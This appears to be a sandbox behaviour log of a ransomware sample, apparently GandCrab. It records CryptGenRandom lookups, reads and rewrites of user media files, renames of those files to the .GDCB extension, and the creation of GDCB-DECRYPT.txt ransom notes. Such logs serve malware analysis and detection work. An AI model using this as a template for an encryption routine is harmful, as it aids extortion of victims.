Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hVvFtKteq1q.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\jdLA6osJ6x3cyku_75S.avi, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\jdLA6osJ6x3cyku_75S.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, size = 1048576, size_out = 4898 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, size = 4912 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\L0CGgz.mkv.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LHNIWSJ-20171110-1726.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LHNIWSJ-20171110-1726.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\MlXrhRSyH8OOfz222Dl_.pps, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\MlXrhRSyH8OOfz222Dl_.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\NbT tZY4nGK-NKUC.mkv, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\NbT tZY4nGK-NKUC.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\NBtZJjP_xEPhcceVV8.m4a, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\NBtZJjP_xEPhcceVV8.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\nmK9pn0EeDdRWu.xlsx, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\nmK9pn0EeDdRWu.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\o h1B4ZQMyLmEA.ods, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\o h1B4ZQMyLmEA.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, size = 1048576, size_out = 61634 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, size = 61648 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\pEYv.bmp.GDCB True 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, size = 1048576, size_out = 12431 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, size = 12432 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\psXl 1.gif.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\P_IZ n5ZsYEU.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\P_IZ n5ZsYEU.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, size = 1048576, size_out = 65480 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, size = 65488 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\u 7QTCnd.flv.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, size = 1048576, size_out = 30807 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, size = 30816 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\UwUP52bZ.gif.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, size = 1048576, size_out = 86656 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, size = 86656 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XFNO_BFGg.m4a.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XPAz2BfWzJmuIx.mkv, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XPAz2BfWzJmuIx.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Y5q_iSG1AAFgs9Oxw7.gif, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Y5q_iSG1AAFgs9Oxw7.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YRyrD_tRBHdMGD-Z.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YRyrD_tRBHdMGD-Z.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YX5UQJjrwszF5k.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YX5UQJjrwszF5k.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
